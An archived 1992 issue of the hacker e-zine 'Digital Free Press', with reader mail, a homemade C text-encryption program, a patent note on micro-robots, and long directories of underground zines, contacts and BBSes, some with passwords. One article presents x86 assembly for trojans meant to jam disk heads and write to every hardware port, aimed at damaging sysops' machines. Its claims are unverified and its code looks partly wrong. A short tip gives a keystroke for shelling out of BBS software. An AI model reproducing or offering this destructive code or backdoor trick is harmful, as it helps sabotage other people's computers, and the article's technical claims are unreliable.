💾 Archived View for gemini.spam.works › mirrors › textfiles › magazines › DFP › dfp-1-4.txt captured on 2022-06-12 at 11:29:03.

View Raw

More Information

-=-=-=-=-=-=-


-------------------------------------------------------------------------------

              #########             ############       #########
              ###########           ############       ###########
              ####    ####          ####               ####    ####
              ####    ####          ####               ####    ####
              ####    ####          ########           ###########
              ####    ####          ########           #########
              ####    ####          ####               ####
              ####    ####          ####               ####
              ###########           ####               ####
              #########             ####               ####

                             DIGITAL FREE PRESS
-------------------------------------------------------------------------------
                    Volume 1.0                Issue 4.0
-------------------------------------------------------------------------------

       * A Publication of The Underground Computing Foundation (UCF) *

       * Send Subscription Requests to: dfp-req%underg@uunet.uu.net *

            * Send Submissions to: hackers%underg@uunet.uu.net *

              * Editor: Max Cray (max%underg@uunet.uu.net) *

        Back issues can be found in the CUD archives at ftp.eff.org

                 [Note: BBS is not currently up. Sorry.]
------------------------------------------------------------------------------

                    Statement of Purpose and Disclaimer

    The Digital Free Press is an uncensored forum to document current
activities in and of the world of modern technology. It is published under the
premise that it is better to know, rather than not know, so no attempt is made
to hide any information no matter how dangerous it may be. Information is a
double edged sword. It is neither good nor bad, and can be used for either
good or bad. Warning: Some information in this document could be used for
illegal activities. Use at your own risk. Articles are the opinion of the
authors listed, and not of the editor (unless of course the editor wrote
it). Information is not verified for accuracy.

------------------------------------------------------------------------------
------------------------------------------------------------------------------

In this Issue:

    1. Mail to Max
    2. Privacy and Electronic Mail by GodNet Raider
    3. Hardware Destructive Code by The BBC
    4. Invisible Killer Chips by Jean-Bernard Condat
    5. Short Takes:
       - Hacking Remote Access by PeeWee
       - Little Black Book of Viruses Review by PeeWee
       - Where to find Online Library Catalogs, and
         How to get info about DEC's new Alpha chip by Wes Morgan
       - Compiling C programs on a VMS system by Max Cray
    6. Paid Advertisement by UPi
    7. FutureCulture (Condensed) by Hawkeye

------------------------------------------------------------------------------
##############################################################################
------------------------------------------------------------------------------

Mail to Max:
-----------

Date: Tue, 28 Apr 92 14:05 GMT
From: Jean-Bernard Condat <uunet!mcimail.com!0005013469>
To: Max Cray <underg!max>
Subject: RE: DFP #3 Bounce Test

Dear Max:

The scene in France is very clear: nothing. The police look at what the
Chaos Computer Club france (CCCF) make... and the secret services work
on several formations for all the people! A lot of anti-virus softwares
are available, but some softs are sell with viruses in it (!). I paid
US$1,000 pro week like Craig Neidorf... because I "have perhaps possess
one hard-to-find NUI"! I mind that the US hacking market is the same:
you have some blue box codes available, the French hackers have some
"Carte Pastel Internationale" codes... and France Telecom don't make any
thing against that. Only some poor teenagers are arrested, but in 60%,
they don't found the good people!

Can I help you?

Jean-Bernard Condat, General Secretary, CCCF
B.P. 8005
69351 Lyon Cedex 08, France

[Editor's note: Of course you can help! Send all your information to:
                hackers%underg@uunet.uu.net and I will try to edit it
                to make it even more useful, and then I will publish
                it in the DFP!]

-----------------------------------------------------------------------------

From: Root of all Evil Account <uunet!stormking.com!root>
Subject: Re: Digital Free Press #3
To: underg!max (Max Cray)
Date: Sun, 26 Apr 92 19:38:24 EDT
X-Mailer: ELM [version 2.3 PL11]

Dear Mr. Cray,

    Recently, 4 users of this system complained about receiving
copies of your "Digital Free Press".  As the distribution site for Phrack,
I in no way discourage freedom of electronic speech.  I do, however,
discourage "cyber junk-mail".  Each of the users mentioned they had not
specifically asked for this to be sent to them.

    In the future, please verify any subscriptions of your newsletter
through me.

            The Root of all Evil at StormKing.Com

[Editor's note: 'Mr. Cray' ... I like that!]

------------------------------------------------------------------------------
##############################################################################
------------------------------------------------------------------------------

From: gnr@tsf.UUCP (GodNet Raider)
Date: Wed, 26 Feb 92 05:17:53 EST
Organization: The CyberUnderground


                      -=[ Privacy and electronic mail ]=-

                                     -or-

                    /*************************************/
                    /* How to whisper over a crowded net */
                    /*************************************/

                                - written by -
                                 GodNet Raider
                                    - of -
                             The CyberUnderground

 -=[ "Information is the greatest weapon of power to the modern wizard." ]=-

]----------------------------------------------------------------------------[

Introduction:
-------------

        A while back I was listening to a pro password sysop talk about the
    'evils' of hacking. His biggest point was that 'a hacker could read
    private mail from/to the person whose' account they have accessed. The
    right or wrong of that point I will leave to others to discuss/flame/get
    flamed over. What stuck with me was the fact that he like many other
    sysops and system admin, their friends and whoever else can access the
    system at high level (or in the case of DOS, can pound the local
    keyboard), can also read any text messages they wish. Some even feel that
    it is a god given right to read any mail, strange seeing that the
    government and even ma bell (remember the phone chase from _the_cuckoo_
    nest_ they could not get the phone number for they did not have a valid
    warrant in in that state) must get a search WARRANT to do the same thing.
    Well it seems what they feel god has giveth them, GodNet Raider can
    taketh away.

        So I thought there must be a simple way to make truly private
    messages to protect all from this 'hacker threat' and nosey sysops
    (etc..) as well (without having to resort to using DES and uuencode,
    for it is slow and a bit of a hassle to use a lot (but it should be noted
    this is the most secure method). Then I remembered an article I read
    in The LOD/H Technical Journal, Issue #3. [Editor's note: The Legion
    of Doom Technical Journals can be found in the CUD archives at
    ftp.eff.org. Highly recommended.] It contained a basic BASIC
    program and explanation to a simple text encryption method using
    cellular automatons by The Mentor (strongly recommended reading for
    understanding the theory behind the method).

        After converting the BASIC code for the second program to C (under
    Minix) I proceeded to make changes to (hopefully improve) it. What
    I came up with is included at the end of this file (MsgLock.c).

        Of the changes made:

            Added the use of stdin/stdout to support a wide extent of I/O
            methods.

            Used multiple cells in defining shift amount.

            Allowed the pass though of char.s not in aszValid array (raw
            output) to keep message integrity (returns and tabs that a
            message may gain/lose in some online editors).

            Added code to expand small key strings to fill out key cells.

        So I hope you find MsgLock of use and remember...

                WMIe`H-h(`[ga0)9oW-/V

MsgLock wish list/projects:
---------------------------

    MsgLock is by no means complete following are some suggestions for
    the obsessed prodigies out there who want to expand on the basic idea.

        For a more private version one can change:

            The size of the key cells (#define WIDTH xx).

            The expansion methods used to fill out the initial key cells.

            The key cell update method.

            The order of the char.s in aszValid.

            Adding/removing char.s from aszValid.

        Msglock could use a way to know when an encoded area begins and
        ends (like the 'begin'/'end' in uuencoded files) to save post
        processing on net messages.

        Removal of char.s used in quoted messages so that it will not try
        to process (cook) char.s added to quoted messages.

        Changes to allow it to be treated like a ASCII Xfer protocol in
        term packages (qmodem, boyan, kermit)/online by bbs packages (RBBS,
        etc..) as an auto encrypt for chat/general online use.

        Or many others I have not thought of.

MsgLock source code:
--------------------

        MsgLock was compiled in Minix using the ACK compatible compiler and
    under DOS using Turbo C++ using ANSI C compatible commands.

    Usage:
        msglock [-d] Key

            -d(code)    : Decode stdin to stdout (MsgLock otherwise
                            encodes stdin to stdout. -d is only
                            used for decoding if followed by a
                            space and is the first parameter following
                            the command ('-dKEY' will be used as a key
                            to encode stdin, use '-d -dKEY' instead to
                            decode)

            Key            : String of char. used to encode/decode stdin
                            to stdout. String can contain spaces.

    Examples:

        msglock key <file1.txt >file2.txt
            Encode file 'file1.txt' to 'file2.txt' using the key string
            'key'.

        msglock -d this is the key <foo
            Decode the file 'foo' to the screen using 'this is the key'
            as the key string.

        msglock knowledge is power >com1 (/dev/tty1 for minix users)
            Encode keyboard input (using the key 'knowledge is power')
            directly to the device/terminal on com port 1.

 +---- Cut Here ----+---- Cut Here ----+---- Cut Here ----+---- Cut Here ---+

/*
    MsgLock.c
        by GodNet Raider.
            Based on a program for encrypting using cellular automaton
                by The Mentor

    Allows encoding of text for transmittal over computer nets and BBSs.

    This program is not to DES standards and should not be considered 100%
    secure by any means.


#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <ctype.h>

#define TRUE 1
#define FALSE 0
#define SPACE 0x20
#define WIDTH 50
#define MAX_CELLS (WIDTH + 2)

char
    *aszErrMsg [] =
        {
         "Usage: msglock [-d(ecode)] Key",
         "Write error on stdout.",
         "Read error on stdin."
        },
    asCells [2] [MAX_CELLS],
    /* Not using 0 offset to prevent errors caused by the fact that */
    /* (0 % x == x % x).                                            */
    aszValid [] = "\xff\ABCDEFGHIJKLMNOPQRST"
                    "yz1234567890!@#$%^&*()-=_+[]{};:'.><,/?\\| \`\"",
    fActive = 0,
    fDecode = FALSE;

void
    main (int, char **),
    FatalErr (int);

void main (argc, argv)
int
    argc;
char
    *argv [];
{
    char
        sWorkKey [WIDTH],
        cInChar;
    int
        nArgCnt = 1,
        nTmpCnt1 = 1,
        nTmpCnt2 = 0,
        nValidSize;

    nValidSize = strlen (aszValid) - 1;
    /* Check for missing parameters. */
    if (argc == 1)
        FatalErr (1);
    /* Check if decode, else default to encode */
    if (*argv [1] == '-' && toupper (argv [1] [1]) == 'D' && !argv [1] [2])
        {
         /* Check for missing parameters, again. */
         if (argc < 3)
            FatalErr (1);
         fDecode = TRUE;
         nArgCnt++;
        }
    /* Move key in to encode/decode key cells to the max set by WIDTH. */
    while (nTmpCnt1 <= WIDTH && nArgCnt < argc)
        if (argv [nArgCnt] [nTmpCnt2])
             asCells [1] [nTmpCnt1++] =
                argv [nArgCnt] [nTmpCnt2++];
        else
            if (++nArgCnt < argc)
                {
                 asCells [1] [nTmpCnt1++] = SPACE;
                 nTmpCnt2 = 0;
                }
    nTmpCnt2 = 1;
    /* Fill unused cells in key cells up to WIDTH. */
    while (nTmpCnt1 <= WIDTH)
        asCells [1] [nTmpCnt1++] = asCells [1] [nTmpCnt2++] ^
            asCells [1] [nTmpCnt1 - 1];
    /* Process stdin. */
    while ((cInChar = (char) getc (stdin)) != EOF)
        {
         /* Check if char. is in aszValid list, if so cook, */
         /* else let it pass though raw. */
         nTmpCnt2 = nValidSize;
         while (nTmpCnt2 && aszValid [nTmpCnt2] != cInChar)
            nTmpCnt2--;
         if (nTmpCnt2)
            {
             /* Update key cells, excluding head and tail. */
             for (nTmpCnt1 = 1; nTmpCnt1 <= WIDTH; nTmpCnt1++)
                asCells [fActive] [nTmpCnt1] =
                    asCells [fActive ^ 1] [nTmpCnt1 - 1] ^
                    (asCells [fActive ^ 1] [nTmpCnt1] |
                    asCells [fActive ^ 1] [nTmpCnt1 + 1]);
             /* Update head of key cells. */
             asCells [fActive] [0] =
                asCells [fActive ^ 1] [WIDTH + 1] ^
                (asCells [fActive ^ 1] [0] |
                asCells [fActive ^ 1] [1]);
             /* Update tail of key cells. */
             asCells [fActive] [WIDTH + 1] =
                asCells [fActive ^ 1] [WIDTH] ^
                (asCells [fActive ^ 1] [WIDTH + 1] |
                asCells [fActive ^ 1] [0]);
             /* Get char shift offset value */
             cInChar = (asCells [fActive] [1] & 0x7f) % WIDTH;
             /* Get char shift value */
             cInChar = asCells [fActive] [(cInChar ? cInChar : WIDTH)];
             /* Switch to updated key cells for next pass. */
             fActive ^= 1;
             /* If decode is TRUE then shift left though aszValid, else  */
             /* shift right (negative numbers in cInChar reverses this). */
             if (fDecode)
                {
             /* Needed to bypass warning message (turbo C++ gets   */
             /* confused sometimes when it sees a single '=' in    */
             /* an 'if' statement, even though it is bracket to be */
             /* evaluated before the 'if').                        */
#ifdef __TURBOC__
                 if ((cInChar = nTmpCnt2 - cInChar) != 0)
#else
                 if ((cInChar = nTmpCnt2 - cInChar))
#endif
                     {
                      if ((cInChar %= nValidSize) < 1)
                        cInChar = nValidSize + cInChar;
                    }
                 else
                     cInChar = nValidSize;
                }
             else
                 if (!(cInChar = (nTmpCnt2 + cInChar) % nValidSize))
                    cInChar = nValidSize;
             /* Write cooked char. to stdout. */
             if (putc (aszValid [cInChar], stdout) == EOF &&
                ferror (stdout))
                FatalErr (2);
            }
         else
             /* Write raw char. to stdout. */
            if (putc (cInChar, stdout) == EOF && ferror (stdout))
                FatalErr (2);
        }
    /* Check for file error on stdin. */
    if (ferror (stdin))
        FatalErr (3);
    /* End program run. */
    exit (0);
}

void FatalErr (ErrNum)
int
    ErrNum;
{
    /* In every life a little rain must fall. */
    /* Complain and bail out.                 */
    fprintf (stderr, "\n%s\n", aszErrMsg [ErrNum - 1]);
    exit (ErrNum);
}

 +---- Cut Here ----+---- Cut Here ----+---- Cut Here ----+---- Cut Here ---+

]============================================================================[

 ...uunet!underg!tsf!gnr (GodNet Raider)
         -=[ "You gotta learn to listen, before you learn to play." ]=-

------------------------------------------------------------------------------
##############################################################################
------------------------------------------------------------------------------

To: hackers@tsf.UUCP
Subject: Text phile 5.
From: bbc@tsf.UUCP (The BBC)
Organization: The CyberUnderground

    Da da.. da da dup... Da da.. da da dup... Da da.. da da dup...
Yes boys and girls... It time once again for your favorite waste
of humanity... Yes it the BBC's Hackit J. Squirrel and crashwinkel
The moose show... So put your antlers on and lets now go to the
magical land of frostbite Falls Min. An see what our heroes are up
to...

    Golly gee Hack... Every time I crash a sysops hard drive with
a trojan... they just reformat the drive and reinstall the
software and are up and running again... I wish there was a way
to bring them down that would really give them something to think
about...

    Maybe there is lets go see Mr. Woopie and his 3D BBC,
crashwinkel...

    So our HEROES went to see Mr. Woopie... But where confronted
by Tennessee tuxedo and his friend chumly... But a quick squeeze
of the trigger on their semi automatic weapons and a short thank
you note to the NRA... An they where in...

    So you boys want to know how to cause more than just data loss
with trojans? Well lets ask the 3D BBC...

    Thank you Mr. Woopie... It sounds like you boys want to hear
about how to force hardware problems using software... 'Wow
Hacket.I only thought you could only do major data loss with
trojans.'... Yes but there are other nasties you could pull if you
want to...

    Take this simple bit of code for example:

    ===============================================================
     mov Ax, 0508h
     mov CX, 8001h
     mov DX, 0000h
     int 13
    ===============================================================

    This small bit of codes just moves the disk heads past the inner
most track... 'But what good is that BBC?'... Well our furry little
friend... Some disks will lock and the only way to fix it is to open
the bugger up... An since the only way to be sure this will or won't
work is to try it... Well...

    Or how about this bit of code:

    ===============================================================
             xor Al, Al
     NextPass:
             mov DX,ffffh
     NextPort:
             out DX, AL
             dec DX
             jnz NextPort
             inc AL
             jmp short NextPass
    ===============================================================

    We like to call it armageddon... 'Ohhh, Ahhhh'... It simply
looks for and writes to every port in the system... An based
on the hardware in the system it can... Toast monitors, Change CMOS
values, Change stepper rates, Change voltages (to burn/disable cards,
boards, and memory), Reek havoc on co-processers, Disable networks,
As well as other nasties too numerous to mention... Seeing that there
is some time involved in writing all those ports... The poor fool
has some time to guess what is going on and shut the computer down
(oh about 4 min.)... 'But we can't test things like that on our
computers.' 'How will we know if it will work or not.'... Who said
to test it on your systems... Not that we would suggest you test
it on others systems... That would make you a wast of humanity
like...

The BBC

----------------------------------------------------------------------
 ...uunet!galaxia!divinity!tsf!bbc (The BBC)
             -=[ "Anarchy is never HAVING to say you're sorry." ]=-

------------------------------------------------------------------------------
##############################################################################
------------------------------------------------------------------------------

Invisible Killer Chips Now Available


Intelligence Newsletter (10 rue du Sentier, 75002 Paris, France)
No. 186 (Jan. 29, 1992), page 2, ISSN 0997-7139
By: Jean-Bernard Condat (CCCF, B.P. 8005, 69351 Lyon Cedex 08, France)


  The military use of computer viruses is often overblown, if not just
simple disinformation as in the recent Iraqi case. But researchers at
Boston University have developed and patented (U.S. patent 5 049 775)
an infinitely more offensive and effective anti-computer agent: the
silicon ant. Micro-electronics has perfected technologies for making
toys and machines so small that they are invisible.

  Using piezoelectric ceramics which expand or contract under an
electric current, the researchers constructed a microscopic ship with
three "legs" on each side and a "cutter" in front. By alternating
current in different sides of each "leg", it bends forward or backward.

  Under remote control the killer chips can be "walked" into a computer
and cut up other microscopic chips, turn around and "walk" away, leaving
invisible damage in the computer system. The killer chips could be solar
powered and therefore have an indefinite life-span.


                             PATENT DESCRIPTION


008245420  WPI Acc No: 90-132421/17
XRPX Acc No: N90-102550
   Piezoelectric micro-machine or robot basic operating unit - made by
    covering silicon cantilever beams projecting from frame with
    piezoelectric material when applied voltages cause them to deflect
Patent Assignee: (UYBO-) BOSTON UNIV
Author (inventor): SMITS J G
Number of Patents: 002
Patent Family:
    CC Number    Kind     Date      Week
    WO 9003665     A     900405     9017   (Basic)
    US 5049775     A     910917     9140
Priority Data (CC,No,Date): US 251565 (880930);
Applications (CC,No,Date): WO 89US4129 (890921);
EP and/or WO Language: English
EP and/or WO Cited Patents:
    No.SR.Pub
Designated States (National): JP (Regional): AT; BE; CH; DE; FR; GB; IT; LU
    ; NL; SE

Abstract (Basic): WO 9003665

         An electrical micromachine is made by securing films (20,22) of
    piezoelectric material to the top surfaces (16,18) of crystalline
    silicon beams (12,14) projecting from a crystalline silicon body (10)
    to form a bimorph structure. A potential applied across the ends
    (24,26) of the piezoelectric films causes the beams to deflect. The
    piezoelectric material used is zinc oxide.
          A number of such micromachines can be assembled to form a robot,
    and when a foot (30) is provided the machine can move itself along a
    surface by sequential deflecting and straightening of the beams. The
    foot can be associated with a toothed wheel to produce rotary motion.
    The micromachine may be solar powered, and can be associated with
    sensors or a microprocessor with programmable memory.
          USE - Microsurgical tools, and robots for grasping, carrying or
    cutting tasks. @(33pp Dwg.No.1/10)@

Abstract (US): 9140 US 5049775

         The piezoelectric actuation machine comprises two cantilever beams
    extending from a frame. The beams comprise a piezoelectric material
    such that application of an electric potential across the material of
    each beam rotationally diplaces the first and second beams relative to
    each other.
           An actuating member is secured between displaceable surfaces on
    the beams and extends orthogonally from a plane through the beams such
    that relative displacement of the beams displaces a portion of the
    member in a direction orthogonal to beam displacement. A rigid object
    contacting the displaced portion of the member is translated relative
    to the member and the frame.
         USE - For piezoelectric micromachines e.g. small robot or cutting
    tool. @(17pp)@

File Segment: EPI
Derwent Class: S05; V06; X25; R46;
Int Pat Class: H01L-041/09
Manual Codes (EPI/S-X): S05-B; V06-M06D; X25-A03E


Jean-Bernard Condat
General Secretary
Chaos Computer Club France
B.P. 8005
69351 Lyon Cedex 08, France
Tel.: +33 78 61 15 88
<uunet!mcimail.com!0005013469>

------------------------------------------------------------------------------
##############################################################################
------------------------------------------------------------------------------

Short Takes:
-----------

------------------------------------------------------------------------------

From: uunet!uga.cc.uga.edu!ART30275%NUSVM.BITNET (PeeWee)

    Hey, press alt-200 (on the numberpad) to access the highest level
   menu in Remote Access v1.10. Often lets u shell out to DOS.

------------------------------------------------------------------------------

From: uunet!CUNYVM.CUNY.EDU!ART30275%NUSVM.bitnet (PeeWee)

      Hey! have you got your copy of The little black book of
                                          Computer viruses yet?

          It's very detailed and good! I had to order it and have it
     shipped over here to me, took me about 3 months (worth the wait!)
  The ISBN is 0-929408020 Author: Mark Ludwig, Publisher: American Eagle

------------------------------------------------------------------------------

From: Wes Morgan <uunet!engr.uky.edu!morgan>

Obligatory Information Pointers:

    List of Online Library Catalogs:
       Anonymous ftp from ftp.unt.edu (129.120.1.1) in directory /pub/library.
       Versions are available in plaintext, PostScript, and WordPerfect 5.0.

[Editor's note: With these lists of online library catalogs you can find out
                much information by learning what libraries have the info
                that you need, and then requesting it via an inter-library
                loan.]

    DEC's new Alpha chip (for you hardware fanatics):
       Call 1-800-332-2717 and ask for the "Alpha Packet".  They'll send you
       the Architecture Handbook (detailed) and more information about the
       Alpha chip.

------------------------------------------------------------------------------

From: Max Cray <max%underg@uunet.uu.net>

    On a VMS system you can not simply type 'CC HELLO.C' to compile a C
program. First you have to define a Link Library. This command will work
for a generic program that does not need floating point:

    DEFINE LNK$LIBRARY SYS$LIBRARY:VAXCRTL

    For more information use the excellent help system in VMS. Simply Type
'HELP CC'.

------------------------------------------------------------------------------
##############################################################################
------------------------------------------------------------------------------

                         PAID POLITICAL ADVERTISEMENT

UPi has once again returned and it no longer the shit group it used to be in
the past.  UPi is a group that puts out newsletters that deals with the
H/P/C/A world.  In the past, our newsletters averaged only 1 article in length
(which in size means a range of 25-50k) but now in the all new UPi newsletter
we have decided to expand it so it will contain more articles (and all quality
articles which means no more of those little shitty files that contains
useless information).  What we are looking for are quality members and sites
that are willing to contribute to the group and support the group.  We are
also looking for people who can freelance write for us too.  We are looking
for people who are experienced in electronics and chemistry, and as well as
any of the P/H/C/A topics.  If you would like to join UPi either as a site or
a member or become a freelance writer for us please send mail to The Lost
Avenger via internet e-mail to the following address Tla@Maria.Wustl.Edu or
you can contact him on his voice mail box at 416-402-0788.

The Lost Avenger/UPi

------------------------------------------------------------------------------
##############################################################################
------------------------------------------------------------------------------

From: uunet!isis.cs.du.edu!ahawks (floyd)
Subject: FutureCulture Update
To: hackers%underg@uunet.uu.net
Date: Tue, 12 May 92 20:38:20 MDT

[Editor's note: This is an edited version of Hawkeye's excellent e-mail
FutureCulture listing. It is intended to deal with the entire CyberPunk/Rave
scene and thus is rather large and comprehensive. I edited out most of the
cultural listings, and left most of the tech listings, since I intend for
the DFP to be more of a technical journal. However it is highly recommended
that you send him mail and get on the mail list.]

_____________________________________________________________________________
                                       |                                     |
                                       |   Magazines (hardcopy) of interest: |
                                       |_____________________________________|

Communications of the ACM
(Association for Computing Machinery, Inc.)
        -sorry, don't have the address or subscription info, but should be
         available at any decent newsstand - also, the ACM has forums
         available on the Internet

Cybertek
OCL/Magnitude
PO Box 64
Brewster, NY   10509
        -hacking, cyberpunks, technology, culture
         $10 a year

Fact Sheet Five
6 Arizona Avenue
Rensselaer, NY   12144-4502
518.479.3707
        -independently-oriented reviewers of the culture
         $3.50 an issue, $33 a year for 8 issue subscriptions
     (unconfirmed rumors say it's no longer in production)

Hac-Tic
pb 22953, 1100 DL
Amsterdam, The Netherlands
ropg@ooc.uva.nl (Internet)
        -published near that hotbed of hackers in holland/amsterdam
         European counterpart to 2600
         $2.30 US an issue

[Editor's note: The above is not in English! Is there a translator?]

Intertek:  The Cyberpunk Journal
Steve Steingerg
325 Ellwood Beach #3
Goleta, CA   93117
steve@cs.ucsb.edu
        -formerly Frank Drake's W.O.R.M
         hacking, cyberspace, interviews, designer drugs, cryonics, etc.
         $2.50 an issue

Iron Feather Journal
PO Box 1905
Boulder, CO   80306
        -hacking, anarchy, techno-phun
         $2 an issue

Mondo 2000
PO Box 10171
Berkeley, CA    94709
415.845.9018 (phone)
415.649.9630 (fax)
mondo2000@mcimail.mci.com
        -your definitive guide to all things cyberpunk and some things not
         should be available at any decent newsstand
         was Reality Hackers and High Frontiers
         $21 for 5 issues (published quarterly)

TAP
PO Box 20264
Louisville, KY   40250
        -the original phreaker's rag, begun by Abbie Hoffman
         formerly YIPL (Youth International Party Line) and then it was
           Technilogical Assistance Program, now it's
           Technilogical Advancement Party
         hacking, anarchy, some political
         has undergone many publishing changes
         operates Blitzkrieg BBS @ 502.499.8933
         TAP-Online also available on some BBSes / FTP sites

2600
PO Box 752
Middle Island, NY   11953-0752
516.751.2600 (office)
516.751.2608 (fax)
2600@well.sf.ca.us (Internet)
        -the original infamous hacker's zine
         subscriptions are $21 for 4 issues (published quarterly)
         back issues are $25 / year

[Editor's note: They also have meetings on the first friday of the month in
                New York City.]

Whole Earth Review
PO Box 38
Sausalito, CA   94966-9932
(Whole Earth runs The Well [Whole Earth Lectronic Link] - well.sf.ca.us)
        -combines new age, techno-culture, california fads, etc.
         should be available at any decent newsstand
         $20 year for subscriptions

____________________________________________________________________________
                                              |                             |
                                              |   E-Magazines and digests:  |
                                              |_____________________________|

[Editor's note: I edited out the listings that did not have references on how
to get them. Suffice it to say that there are many more journals available
that are not listed here. See some of the Internet and BBS listings for
places to find these items.]

Activist Times Incorporated
gzero@tronsbox.xei.com
        -political, hacking, anarchy

Computers and Academic Freedom
listserv@eff.org <add comp-academic-freedom-news>
        -computing freedom, mostly deals with college campuses

Computer Underground Digest
tk0jut2@niu.bitnet

Digital Free Press
dfp-req%underg@uunet.uu.net
        -hacking, information, etc.

EFF News (EFFector Online)
effnews-request@eff.org
        -sends out EFFector Online, the Electronic Frontier foundation's
                e-journal

Freaker's Bureau International
au530@cleveland.freenet.edu
        -anarchy, hacking, cyberpunk

Informatik
inform@doc.cc.utexas.edu
        -hacking, phreaking, computer underground, cyberpunk, etc.

Network Information Access
nia@nuchat.sccsi.com
        -hacking, computer underground, etc.

Phantasy
Mercenary@f515.n141.z1.fidonet.org
        -anarchy, hacking

Phrack
phracksub@stormking.com
        -need we say more - the one, the only hacking e-zine...

Pirate Radio
brewer@ace.enet.dec.com
        -pirate radio

RISKS Digest
risks-request@csl.sri.com
        -the RISKS of computing in our lives

Telecom Privacy Digest
telecom-priv-request@pica.army.mil
        -deals with privacy aspects of telecommunications
         most of the conversation revolves around Caller-ID and such

Telecom Digest
telecom-request@eecs.nwu.edu
        -deals with all aspects of telecommunications

Virus-l Digest
krvw@cert.sei.cmu.edu
(also virus-l on BITNET)
        -discussion of viruses and all aspects of 'em

Worldview - Der Weltanschauung
fox@nuchat.sccsi.com
        -hacking, computer underground, church of subgenius, political, etc.

_____________________________________________________________________________
                                                        |                    |
                                                        |  E-Mail Addresses: |
                                                        |____________________|

(please use care and consideration when mailing to these people)

Aristotle                       uk05744@ukpr.uky.edu
John Perry Barlow               barlow@well.sf.ca.us
Dorothy Denning                 denning@cs.georgetown.edu
Peter J Denning                 pjd@cs.gwu.edu
Desert Fox                      dfox@taronga.com
Dispater                        dispater@stormking.com
The EFF                         eff@eff.org
Freaker's Bureau Int'l          au530@cleveland.freenet.edu
Gatsby                          gatsby@ryptyde.tcs.com
Mike Godwin                     mnemonic@eff.org
Emmanuel Goldstein              emmanuel@well.sf.ca.us
Ground Zero                     gzero@tronsbox.xei.com
Hactic                          ropg@ooc.uva.nl
Hawkeye (put this art. together)ahawks@nyx.cs.du.edu
Intertek                        steve@cs.ucsb.edu
Judge Dredd                     elisem@nuchat.sccsi.com
Mitch Kapor                     mkapor@eff.org
Knight Lightning (Craig Neidorf)knight@well.sf.ca.us
                                kl@stormking.com
Lord Macduff                    macduff@nuchat.sccsi.com
Mentor (Lloyd Blankenship)      cs.utexas.edu!dogface!fnordbox!loydb
Mondo 2000                      mondo2000@mcimail.mci.com
Gordon Meyer                    72307.1502@compuserve.com
Peter G Neumann                 neumann@csl.sri.com
Pengo (Hans Heubner)            hans@trabant.at
John S Quarterman               jsq@tic.com
Len Rose                        len@netsys.netsys.com
RU Sirius                       rusirius@well.sf.ca.us
Cliff Stoll                     cliff@cfa.harvard.edu
Michael Synergy                 synergy@metaphor.com
Jim Thomas                      tk0jut1@niu.bitnet
Tuc                             tuc@stormking.com
2600                            2600@well.sf.ca.us

[Editor's note: How about Eric S. Raymond author of 'The New Hacker's
                Dictionary'? He is at: eric@snark.thyrsus.com.

Also Belgorath provides these alternate addresses:

Hans Huebner (aka Pengo) is hans@trabant.artcom.de, or
                            hans@skoda.vie.artcom.de

Cliff Stoll (No known alias) is stoll@earthquake.berkeley.edu]

_____________________________________________________________________________
                                                              |              |
                                                              |   FTP Sites: |
                                                              |______________|

(all of these sites carry either computer underground information, information
on drugs, music, subgenius, etc.)

18.26.0.36                      lcs.mit.edu
18.26.0.179                     zurich.ai.mit.edu
128.6.4.15                      pyrite.rutgers.edu
128.6.60.6                      quartz.rutgers.edu
128.8.2.114                     sayshell.umd.@edu
128.83.132.20                   ??
128.95.136.1                    milton.u.washington.edu
128.100.3.6                     ftp.cs.toronto.edu
128.135.46.7                    ??
128.135.252.7                   ??
128.174.5.50                    @uxc.@cso.@uiuc.@edu
128.214.6.100                   @nic.@funet.fi
128.235.33.1                    ??
128.252.135.4                   @wuarchive.@wustl.@edu
129.173.4.5                     cs.dal.ca
130.18.64.2                     ??
130.43.2.3                      bric-a-brac.apple.com
130.56.96.2                     ??
130.71.192.18                   stolaf.edu
130.234.0.1                     jyu.fi
131.188.31.3                    faui43.informatik.uni-erlangen.de
131.210.1.4                     cs.uwp.edu
133.137.4.3                     ??
134.60.66.21                    ??
134.95.132.2                    aix370.rrz.uni-koeln.de
137.39.1.9                      uunet.uu.net
146.169.3.7                     ??
192.88.144.4                    eff.org
192.88.209.5                    cert.sei.cmu.edu
_____________________________________________________________________________
                                                                  |          |
                                                                  |   BBSes: |
                                                                  |__________|
201.451.3063                    Wrong Number
203.485.0088                    Rune Stone
203.628.9660                    Dark Shadows
206.454.0075                    Manta lair
209.526.3194                    Tequilla Willie's Great Subterranean Carnival
214.324.3501                    KeelyNet
214.522.5321                    Dead Zone
215.449.1902                    Time Enough for Love BBS
303.438.1481                    The Kracker Box
303.871.4824                    Nyx (public access unix)
312.528.5020                    Ripco
401.847.2603                    Underground
414.789.4210                    PC Exec
415.332.6106                    The Well
415.472.5527                    The Cyberden
502.499.8933                    Blitzkrieg
503.635.2615                    Awakening Technology
512.447.4449                    The Illuminati BBS
517.337.7319                    Pure Nihilism
602.861.3167                    Frayed Ends
617.475.6187                    Convent
617.861.8976                    The Works
618.549.4955                    Free Speech
708.672.5426                    World Trade Center
713.242.6853                    Face-2-Face
718.358.9209                    Switchboard
718.428.6776                    Milliways
806.794.4362                    Demon Roach Underground
914.761.6877                    Uncensored
916.673.8412                    Greenpeace's Inverted Granola Bar

--

[Editor's note: The Underground is no longer up (I moved). Perhaps at a
                later date I will put it back up.

Other Boards I know about:

408.241.9760                    NetCom - Network Access

408.245.7726                    darkside.com (The Waffle support BBS)

408.867.7400                    Spies in the Wire
                                Most Notorius hangout for hardened Cyber-
                                Criminals. Ask for access to 'The Good Stuff'
                                and tell them Max sent ya.

602.894.1757                    Unphamiliar Territory
                                NUP (New user Password) 'Bunnylust'

717.361.0947                    Digital Warfare
                                Phalcon-Skism, 40 Hex Mag, Viruses
                                (Sorry, forgot the NUP)

916.481.2306                    Phun Line
                                Password 'Darkness has Fallen'

359.2.20.4198                   Virus eXchange BBS in Sofia, Bulgaria
                                Working hours:
                                    20:00 - 06:00 GMT (in the winter)
                                    19:00 - 05:00 GMT (in the summer)

Also the NUP for Blitzkrieg is 'Columbian Coke'.]
_____________________________________________________________________________
                                                  |                          |
                                                  |  Merchandise/Companies:  |
                                                  |__________________________|

(a lot of the companies on this list are on the very edge of the underground,
and would not exist but for the 1st amendment - please use caution and care
when dealing with these people, and don't abuse them, otherwise you'll ruin it
for us all!)

Abbie Yo-Yo Inc.
PO Box 15
Worcester, MA   01613
           -things related to Abbie Hoffman

Amok
PO Box 861867 Terminal Annex
Los Angeles, CA   90086-1867
